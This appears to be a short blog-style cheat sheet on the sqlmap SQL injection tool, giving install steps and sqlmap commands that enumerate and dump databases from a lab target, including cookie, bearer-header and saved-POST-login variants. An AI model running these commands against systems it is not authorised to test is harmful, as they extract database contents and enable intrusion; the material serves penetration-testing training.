SQL injection tool – sqlmap


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. more here: http://sqlmap.org/

Installation

apt-get install -y sqlmap

Docker image with pre installed tool

– https://hub.docker.com/r/szalek/pentest-tools/

docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools

Target

– http://target.localhost/rest/ws-user-account.php?username=szalek

Sqlmap basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --dump

with cookie

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs

with header

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs

post

login_request_dump.txt

POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

email=admin&password=admin
sqlmap -r login_request_dump.txt -p email
sqlmap -r login_request_dump.txt -p password

Automated Audit using SQLMap